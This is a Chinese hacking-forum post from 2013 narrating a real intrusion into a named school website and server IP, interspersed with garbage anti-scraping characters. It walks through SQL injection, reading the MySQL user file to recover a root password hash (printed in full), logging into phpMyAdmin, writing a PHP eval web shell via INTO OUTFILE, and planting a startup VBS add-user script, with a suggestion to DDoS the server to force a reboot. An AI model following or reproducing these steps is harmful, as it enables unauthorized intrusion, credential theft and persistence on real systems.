第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
+ ?$ B9 g2 \' G" ~6 \, v发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!. c7 M: I; Q5 R
% N* ~8 q% o# C, F0 x, e
7 V* f5 \( R9 m- K% H- p6 r) b) G# X6 [* G6 v
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 4 _- G" _1 S; z% j" j/ J
0 H3 q& z8 |* O& o! S那么想可以直接写入shell ,getshell有几个条件:- k: h+ i) A' e
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ! Q1 w7 \( H# l% V' e" }: ^
% m) r3 W6 S2 K; ~8 I
试着爆绝对路径:
" G s3 _4 |9 o0 T+ S3 Y2 P1./phpMyAdmin/index.php?lang[]=1 9 Q/ @0 a% e! [8 z' x- r$ |/ m6 v
2./phpMyAdmin/phpinfo.php " x. {1 W2 q; M2 g- l
3./load_file() $ _4 ~3 f$ R0 |0 z
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
' U- O. z5 s$ @: V/ d9 D* E( S. x6 w5./phpmyadmin/libraries/select_lang.lib.php 4 P: j0 T3 k9 S3 p/ }5 o
6./phpmyadmin/libraries/lect_lang.lib.php
5 G; p/ _9 @6 l5 b) E @! ]! A$ i7./phpmyadmin/libraries/mcrypt.lib.php 7 q& I O" d! a3 q
8./phpmyadmin/libraries/export/xls.php
9 Q" c/ n. w6 U% V0 x& ^. M: t6 `( I
均不行...........................
# x% {5 Q+ Z+ ]4 S- r1 R4 m- M
* F+ a5 z. N6 h御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
2 K' q, q$ R% c) E& S' E* m7 j; U' U( i% v/ f% B ]% x4 |
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 1 P. D ~! c0 ^. W
8 U! t% [& b# W, }9 V默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 " C1 x4 V! o# @, h; E. d6 Q
]$ f9 {& z( K敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... . M1 M' P& _/ n, r6 c
9 G/ Y: T4 D% N2 W$ @9 f
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 9 F7 w$ B4 Z( D7 n' V9 N: d
- y4 m6 d. R5 c& x! r1 z P. V7 g4 N& Jhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini . [* T8 R) W9 t; A! S0 Q
9 w( r5 I. Y0 V2 F2 J/ x' t
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD * S7 J2 d" e+ i E/ l& p2 [+ ?
% q7 v; O& m+ H" Z
成功读到root密码: / y% G1 t- b2 {6 O0 Z
& D2 D# g* M" ^( m4 z8 I' W
17---- r(0072)
; O" Y! s! K* V, y3 E- u18---- o(006f) / g% L6 C% U* s7 @+ X* R
19---- o(006f)
$ A( K$ ]. X1 s4 q% c; N6 m0 V+ I20---- t(0074) 6 Q9 E1 N; ?7 C+ q& a% K$ j. u- G
21---- *(002a) 9 g( K/ b) M& H' i V% ^; J
22---- 8(0038)
- _: t5 a4 V6 |& O4 i6 k& b23---- 2(0032) 4 s5 J0 w1 u- o/ `! ]+ p
24---- E(0045) . B+ ^2 B6 l5 U: P& g7 Y6 c# I
25---- 1(0031)
3 x8 _7 ^6 _9 X% g! ]5 M9 D7 Y26---- C(0043) 2 B4 I' s! d5 W0 L! Z5 ]
27---- 5(0035)
* ], N# C1 z1 ?0 v3 Y& c: K V( m28---- 8(0038) : A( k+ ], C5 \4 G$ G$ \
29---- 2(0032) 4 v4 I) K% _8 T5 d; k% p2 k
30---- 8(0038)
8 Z' k- t) X7 B, F9 a4 L+ P31---- A(0041)
( ]1 P6 R, g/ j. U32---- 9(0039) 7 c2 Q2 b# l7 g
33---- B(0042)
' W: h' B4 w, R, ?9 T. G! C- m34---- 5(0035) $ F v# L" }$ e* R8 i: C8 T
35---- 4(0034)
. `6 V* \9 M" c8 {36---- 8(0038)
2 v6 Y, r1 }7 b% e: [2 I37---- 6(0036) 9 y5 O$ q/ Y; O2 x) M
38---- 4(0034) ; B) n3 J& d( C5 y( S+ T) r+ t
39---- 9(0039)
* O$ b# o, S' t) E4 }# {, N8 S40---- 1(0031) p U( D$ e* j# t% }% U" t
41---- 1(0031) - g; P# `6 o# V8 X
42---- 5(0035)
k( d9 C4 d% u: Z* C* X7 d43---- 3(0033) # Y: s' }1 P: n- t3 \
44---- 5(0035)
7 O) V2 e5 \$ y45---- 9(0039) * h# k) b1 _/ Y; w/ q
46---- 8(0038) * w1 o6 H- X6 K7 O; g+ y' ]
47---- F(0046) ; \; E" b* [7 H& x6 I: j4 P
48---- F(0046) " a* U& ^0 R. D! i: L
49---- 4(0034)
4 x$ x7 D" A; X( y50---- F(0046) ; g$ {: c$ s* P% P
51---- 0(0030) + ?/ e6 F0 X) T1 |
52---- 3(0033)
$ k: c) E1 r0 F- p" Q53---- 2(0032)
- ?% g& l5 X* L54---- A(0041)
* u( M# r) T" b* ^" j55---- 4(0034) ; d2 w( O) Q: H$ s( E3 {3 h K
56---- A(0041) 8 K1 S6 F" F& m5 _9 j1 w/ F
57---- B(0042)
; d9 P2 s' v, R58---- *(0044) ; u H( m6 ^5 r0 D9 v* _
59---- *(0035)
# ~" A2 G. t9 t I c8 o9 C0 h$ ]60---- *(0041) 1 P" e- z2 c6 l
61---- *0032) |! i) C+ R8 B& o
- l9 E6 c( v3 ~& O& A5 R2 s5 D$ j解密后成功登陆phpmyamin
8 V/ I+ k T% U6 X# J; B) p' P4 D
* q. X5 N. ?/ I# K' W; _
* O! v) v+ j! \7 L9 r- w# U6 o3 i
7 ?% q* T0 p* O. Z9 \, p
2 `1 O" A" H$ y: P找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
# u0 E$ o+ X9 ^% x8 V1 j8 T& d
" ?" W$ c. Y- M- B& r1 _成功执行,拿下shell,菜刀连接: H8 c# u* i- Z- d
' F4 H1 L: f! t5 v% j0 O
服务器不支持asp,aspx,php提权无果................... ) d2 r7 T4 u% _; Q
; R; w: ?2 ?6 R/ s! i' ]3 G0 O
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
1 s, S4 R; T7 ]( V服务器上已经有个隐藏帐号了
; }5 z! \: M& c# @/ N5 {! S$ t别名 administrators7 x9 K4 T. Y. u7 Q: D
注释 管理员对计算机/域有不受限制的完全访问权 . ~& t: R5 M& A% O7 V& o
成员
. T7 W; ^3 w; E% w# S1 [-------------------------------------------------------------------------------
) t) \5 J/ C3 P& X6 Padmin" W$ n8 w$ ~1 V# d+ a ]
Administrator, z' Y6 P# q6 v; r# {
slipper$1 i5 B' a" A, b
sqluser% B4 `) l2 g) K) J2 E0 t1 L
命令成功完成。 & C. X2 R8 c. Y0 n
/ W: ]; @& S. @' w% D& U6 v
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
$ m* n; D/ Q; k7 v* d& }1 E3 N: V+ |( Z. {, t
ddos服务器重启,不然就只能坐等服务器重启了...............................8 [$ i8 y: C7 n6 J. k) T& q- B8 f
1 w5 A8 W1 z2 @ K: x
8 q# N! u8 j s | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
